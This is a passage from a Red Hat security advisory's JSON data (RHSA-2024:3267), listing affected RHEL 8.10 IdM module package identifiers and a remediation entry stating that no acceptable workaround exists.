"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:3267"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
